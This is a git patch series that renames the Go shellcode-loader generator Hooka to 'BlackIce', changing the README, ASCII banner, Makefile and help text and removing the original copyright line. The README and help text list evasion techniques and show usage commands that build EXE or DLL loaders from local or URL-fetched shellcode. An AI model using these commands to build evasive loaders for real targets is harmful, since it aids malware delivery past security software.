From 2fddc95163ed5a609bf5b2458cb16152d870f050 Mon Sep 17 00:00:00 2001
From: MrDedSec <91702292+Mrdedsecurity@users.noreply.github.com>
Date: Thu, 11 Dec 2025 18:47:49 +0000
Subject: [PATCH 1/9] Update README.md
---
README.md | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/README.md b/README.md
index 67be46b..dec0272 100644
--- a/README.md
+++ b/README.md
@@ -1,7 +1,7 @@
-
@@ -30,7 +30,7 @@
# Introduction
-Hooka is able to generate shellcode loaders with multiple capabilities. It is also based on other tools like [BokuLoader](https://github.com/boku7/BokuLoader), [Freeze](https://github.com/optiv/Freeze) or [Shhhloader](https://github.com/icyguider/Shhhloader), and it tries to implement more evasion features. Why in Golang? Although it's not the perfect language for malware dev, it works perfectly for testing purposes. Obviously if you want something professional and foolproof you should create your own loader in C++, C# or similars.
+BlackIce is able to generate shellcode loaders with multiple capabilities. It is also based on other tools like [BokuLoader](https://github.com/boku7/BokuLoader), [Freeze](https://github.com/optiv/Freeze) or [Shhhloader](https://github.com/icyguider/Shhhloader), and it tries to implement more evasion features. Why in Golang? Although it's not the perfect language for malware dev, it works perfectly for testing purposes. Obviously if you want something professional and foolproof you should create your own loader in C++, C# or similars.
# Features
From b7e764ae24978bb42cbc869783869b73c0031446 Mon Sep 17 00:00:00 2001
From: MrDedSec <91702292+Mrdedsecurity@users.noreply.github.com>
Date: Thu, 11 Dec 2025 18:51:04 +0000
Subject: [PATCH 2/9] Update README.md
---
README.md | 22 +++-------------------
1 file changed, 3 insertions(+), 19 deletions(-)
diff --git a/README.md b/README.md
index dec0272..c94c7be 100644
--- a/README.md
+++ b/README.md
@@ -10,14 +10,6 @@
-
-
-
-
-
-
-
-
@@ -79,8 +71,8 @@ This tool is able to generate loaders with this features:
Just clone the repository like this:
```sh
-git clone https://github.com/D3Ext/Hooka
-cd Hooka
+git clone https://github.com/Mrdedsecurity/BlackIce-Loader.git
+cd BlackIce-Loader
make
```
@@ -90,7 +82,7 @@ After that you will find the binary under the `build/` folder
> Help panel
```
-Usage of Hooka:
+Usage of BlackIce:
REQUIRED:
-i, --input string payload to inject in raw format, as PE, as DLL or from a URL
-o, --output string name of output file (i.e. loader.exe)
@@ -167,12 +159,6 @@ $ hooka_linux_amd64 --calc -o loader.exe --user "DESKTOP-E1D6G0A\tom" --computer
-# TODO
-
-- ~~Check username and hostname before running~~
-- Add direct and indirect syscall
-- Add Chacha20 cypher to encrypt shellcode
-
# Library
The official Golang package has most of the already mentioned features and some others. To make use of it, see [here](https://github.com/D3Ext/Hooka/tree/main/examples) and [here](https://github.com/D3Ext/Hooka/tree/main/pkg/hooka)
@@ -213,7 +199,5 @@ Use this project under your own responsability! The author is not responsible of
This project is under [MIT](https://github.com/D3Ext/Hooka/blob/main/LICENSE) license
-Copyright © 2025, *D3Ext*
-
From 746e97eca40ad8a7f7f413a55891b7003d6e5a90 Mon Sep 17 00:00:00 2001
From: MrDedSec <91702292+Mrdedsecurity@users.noreply.github.com>
Date: Thu, 11 Dec 2025 19:11:52 +0000
Subject: [PATCH 3/9] updated readme
---
README.md | 3 +--
1 file changed, 1 insertion(+), 2 deletions(-)
diff --git a/README.md b/README.md
index c94c7be..3598b9d 100644
--- a/README.md
+++ b/README.md
@@ -22,8 +22,7 @@
# Introduction
-BlackIce is able to generate shellcode loaders with multiple capabilities. It is also based on other tools like [BokuLoader](https://github.com/boku7/BokuLoader), [Freeze](https://github.com/optiv/Freeze) or [Shhhloader](https://github.com/icyguider/Shhhloader), and it tries to implement more evasion features. Why in Golang? Although it's not the perfect language for malware dev, it works perfectly for testing purposes. Obviously if you want something professional and foolproof you should create your own loader in C++, C# or similars.
-
+BlackIce is able to generate shellcode loaders with multiple capabilities. It is also based on Hooka (see [here](https://github.com/D3Ext/Hooka)). This tool is intended for my own learning, please no not use the tool for malicious activity.
# Features
This tool is able to generate loaders with this features:
From 6cd3cf09532e010cb08a4cd68c821ca90b9e5b75 Mon Sep 17 00:00:00 2001
From: MrDedSec <91702292+Mrdedsecurity@users.noreply.github.com>
Date: Thu, 11 Dec 2025 19:26:43 +0000
Subject: [PATCH 4/9] banner alt
---
cmd/main.go | 29 +++++++++++++++++++++--------
1 file changed, 21 insertions(+), 8 deletions(-)
diff --git a/cmd/main.go b/cmd/main.go
index d7a33d1..7042425 100644
--- a/cmd/main.go
+++ b/cmd/main.go
@@ -32,18 +32,31 @@ type LoaderTemplate struct {
}
// function to print the banner
-func banner(){
- fmt.Println(" _ _ _ _")
- fmt.Println(" | | | | ___ ___ | | __ __ _ | |")
- fmt.Println(" | |_| | / _ \\ / _ \\ | |/ / / _` | | |")
- fmt.Println(" | _ | | (_) | | (_) | | < | (_| | |_|")
- fmt.Println(" |_| |_| \\___/ \\___/ |_|\\_\\ \\__,_| (_)")
+func banner() {
+ fmt.Println("\033[36m") // Cyan color for ice effect
+ fmt.Println("╔═══════════════════════════════════════════════════════════════════╗")
+ fmt.Println("║ ║")
+ fmt.Println("║ ▄▄▄▄ ██▓ ▄▄▄ ▄████▄ ██ ▄█▀ ██▓ ▄████▄ ▓█████ ║")
+ fmt.Println("║ ▓█████▄ ▓██▒ ▒████▄ ▒██▀ ▀█ ██▄█▒ ▓██▒▒██▀ ▀█ ▓█ ▀ ║")
+ fmt.Println("║ ▒██▒ ▄██▒██░ ▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒██▒▒▓█ ▄ ▒███ ║")
+ fmt.Println("║ ▒██░█▀ ▒██░ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ░██░▒▓▓▄ ▄██▒▒▓█ ▄ ║")
+ fmt.Println("║ ░▓█ ▀█▓░██████▒▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░██░▒ ▓███▀ ░░▒████▒ ║")
+ fmt.Println("║ ░▒▓███▀▒░ ▒░▓ ░▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░▓ ░ ░▒ ▒ ░░░ ▒░ ░ ║")
+ fmt.Println("║ ▒░▒ ░ ░ ░ ▒ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ▒ ░ ░ ▒ ░ ░ ░ ║")
+ fmt.Println("║ ░ ░ ░ ░ ░ ▒ ░ ░ ░░ ░ ▒ ░░ ░ ║")
+ fmt.Println("║ ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ║")
+ fmt.Println("║ ░ ░ ░ ║")
+ fmt.Println("║ ║")
+ fmt.Println("║ ░▒▓█ B L A C K I C E █▓▒░ ║")
+ fmt.Println("║ By MrDedSec ║")
+ fmt.Println("╚═══════════════════════════════════════════════════════════════════╝")
+ fmt.Println("\033[0m") // Reset color
}
// function to print the help panel
func help_panel(){
fmt.Println(`
-Usage of Hooka:
+Usage of BlackIce:
REQUIRED:
-i, --input string payload to inject in raw format, as PE, as DLL or from a URL
-o, --output string name of output file (i.e. loader.exe)
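Review bot: The new `banner()` writes the colour escapes `\033[36m` and `\033[0m` unconditionally, so when stdout is redirected to a file or build log, or the console does not interpret ANSI sequences, the raw escape bytes end up in the output. Gating the colour would avoid that, e.g. `useColour := os.Getenv("NO_COLOR") == ""` followed by `if useColour { fmt.Print("\033[36m") }`, with the same guard on the reset; `os` looks to be imported already, since `CompileLoader` in this file calls `os.IsNotExist`. Using `fmt.Print` rather than `fmt.Println` for the two escape lines also drops the blank line each of them currently adds around the box. The box-drawing and block glyphs assume a UTF-8 capable console, which is worth stating in the comment above the function, e.g. `// banner prints the BlackIce logo; it assumes a UTF-8 terminal.` `help_panel` begins in this hunk but its body continues outside it.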
@@ -102,7 +115,7 @@ Examples:
// as the names may be a little bit confussing
var techniques []string = []string{"ntcreatethreadex", "ntcreatethread", "suspendedprocess", "etwpcreateetwthread", "processhollowing", "no-rwx", "nrwx", "norwx", "ntqueueapcthreadex"}
-var buffer bytes.Buffer
+var buffer bytes.Buffer
func main() {
// define variables that will hold CLI arguments values
From 8b471ab4975f90cb90d8c47c16cac58106157029 Mon Sep 17 00:00:00 2001
From: MrDedSec <91702292+Mrdedsecurity@users.noreply.github.com>
Date: Thu, 11 Dec 2025 19:32:56 +0000
Subject: [PATCH 5/9] hooka -> Blackice
---
Makefile | 2 +-
cmd/main.go | 10 +++++-----
2 files changed, 6 insertions(+), 6 deletions(-)
diff --git a/Makefile b/Makefile
index 38ad2fd..8129aad 100644
--- a/Makefile
+++ b/Makefile
@@ -1,4 +1,4 @@
-EXECUTABLE=hooka
+EXECUTABLE=blackice
WINDOWS=$(EXECUTABLE)_windows_amd64.exe
LINUX=$(EXECUTABLE)_linux_amd64
DARWIN=$(EXECUTABLE)_darwin_amd64
diff --git a/cmd/main.go b/cmd/main.go
index 7042425..2f615ce 100644
--- a/cmd/main.go
+++ b/cmd/main.go
@@ -103,10 +103,10 @@ Usage of BlackIce:
-h, --help print help panel
Examples:
- hooka -i shellcode.bin -o loader.exe
- hooka -i http://192.168.1.126/shellcode.bin -o loader.exe
- hooka -i shellcode.bin -o loader.exe --exec NtCreateThreadEx --unhook full --sleep --acg
- hooka -i shellcode.bin -o loader.dll --domain www.domain.com --enc aes --verbose
+ blackice -i shellcode.bin -o loader.exe
+ blackice -i http://192.168.1.126/shellcode.bin -o loader.exe
+ blackice -i shellcode.bin -o loader.exe --exec NtCreateThreadEx --unhook full --sleep --acg
+ blackice -i shellcode.bin -o loader.dll --domain www.domain.com --enc aes --verbose
`)
}
@@ -3247,7 +3247,7 @@ func CompileLoader(format string, output_file string, compress bool, arch string
if os.IsNotExist(err) {
// if it doesn't exist, then create it
- mod_cmd := exec.Command("go", "mod", "init", "hooka_ldr")
+ mod_cmd := exec.Command("go", "mod", "init", "blackice_ldr")
err = mod_cmd.Run()
if err != nil {
return err
From e98297693b8fe263b2f1d83462c8bc078839217d Mon Sep 17 00:00:00 2001
From: MrDedSec <91702292+Mrdedsecurity@users.noreply.github.com>
Date: Thu, 11 Dec 2025 19:35:23 +0000
Subject: [PATCH 6/9] readme commands examples to blackice. git clone link
fixed
---
README.md | 22 +++++++++++-----------
1 file changed, 11 insertions(+), 11 deletions(-)
diff --git a/README.md b/README.md
index 3598b9d..c714dbd 100644
--- a/README.md
+++ b/README.md
@@ -70,7 +70,7 @@ This tool is able to generate loaders with this features:
Just clone the repository like this:
```sh
-git clone https://github.com/Mrdedsecurity/BlackIce-Loader.git
+git clone https://github.com/Mrdedsecurity/BlackIce.git
cd BlackIce-Loader
make
```
@@ -128,28 +128,28 @@ Usage of BlackIce:
-h, --help print help panel
Examples:
- hooka -i shellcode.bin -o loader.exe
- hooka -i http://192.168.1.126/shellcode.bin -o loader.exe
- hooka -i shellcode.bin -o loader.exe --exec NtCreateThreadEx --unhook full --sleep --acg
- hooka -i shellcode.bin -o loader.dll --domain www.domain.com --enc aes --verbose
+ blackice -i shellcode.bin -o loader.exe
+ blackice -i http://192.168.1.126/shellcode.bin -o loader.exe
+ blackice -i shellcode.bin -o loader.exe --exec NtCreateThreadEx --unhook full --sleep --acg
+ blackice -i shellcode.bin -o loader.dll --domain www.domain.com --enc aes --verbose
```
> Generate a simple EXE loader
```sh
-$ hooka_linux_amd64 -i shellcode.bin -o loader.exe
+$ blackice_linux_amd64 -i shellcode.bin -o loader.exe
```
> Generate a DLL loader
```sh
-$ hooka_linux_amd64 -i shellcode.bin -o loader.dll -f dll
+$ blackice_linux_amd64 -i shellcode.bin -o loader.dll -f dll
```
> Use custom config (various examples)
```sh
-$ hooka_linux_amd64 -i shellcode.bin -o loader.exe --hashing --agc --sleep --verbose
-$ hooka_linux_amd64 -i shellcode.bin -o loader.exe --exec ProcessHollowing --sgn --strings --blockdlls
-$ hooka_linux_amd64 -i http://xx.xx.xx.xx/shellcode.bin --sandbox --sleep --domain www.microsoft.com --verbose
-$ hooka_linux_amd64 --calc -o loader.exe --user "DESKTOP-E1D6G0A\tom" --computername "DESKTOP-E1D6G0A" --compress --strings
+$ blackice_linux_amd64 -i shellcode.bin -o loader.exe --hashing --agc --sleep --verbose
+$ blackice_linux_amd64 -i shellcode.bin -o loader.exe --exec ProcessHollowing --sgn --strings --blockdlls
+$ blackice_linux_amd64 -i http://xx.xx.xx.xx/shellcode.bin --sandbox --sleep --domain www.microsoft.com --verbose
+$ blackice_linux_amd64 --calc -o loader.exe --user "DESKTOP-E1D6G0A\tom" --computername "DESKTOP-E1D6G0A" --compress --strings
```
# Demo
From 3378c415da081d82c772cadd8e5e006e8b504914 Mon Sep 17 00:00:00 2001
From: MrDedSec <91702292+Mrdedsecurity@users.noreply.github.com>
Date: Thu, 11 Dec 2025 19:41:21 +0000
Subject: [PATCH 7/9] readme updated
---
README.md | 19 ++++++++++++++++---
1 file changed, 16 insertions(+), 3 deletions(-)
diff --git a/README.md b/README.md
index c714dbd..32165ba 100644
--- a/README.md
+++ b/README.md
@@ -1,9 +1,22 @@
-
+▄▄▄▄ ██▓ ▄▄▄ ▄████▄ ██ ▄█▀ ██▓ ▄████▄ ▓█████ +▓█████▄ ▓██▒ ▒████▄ ▒██▀ ▀█ ██▄█▒ ▓██▒▒██▀ ▀█ ▓█ ▀ +▒██▒ ▄██▒██░ ▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒██▒▒▓█ ▄ ▒███ +▒██░█▀ ▒██░ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ░██░▒▓▓▄ ▄██▒▒▓█ ▄ +░▓█ ▀█▓░██████▒▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░██░▒ ▓███▀ ░░▒████▒ +░▒▓███▀▒░ ▒░▓ ░▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░▓ ░ ░▒ ▒ ░░░ ▒░ ░ +▒░▒ ░ ░ ░ ▒ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ▒ ░ ░ ▒ ░ ░ ░ + ░ ░ ░ ░ ░ ▒ ░ ░ ░░ ░ ▒ ░░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ++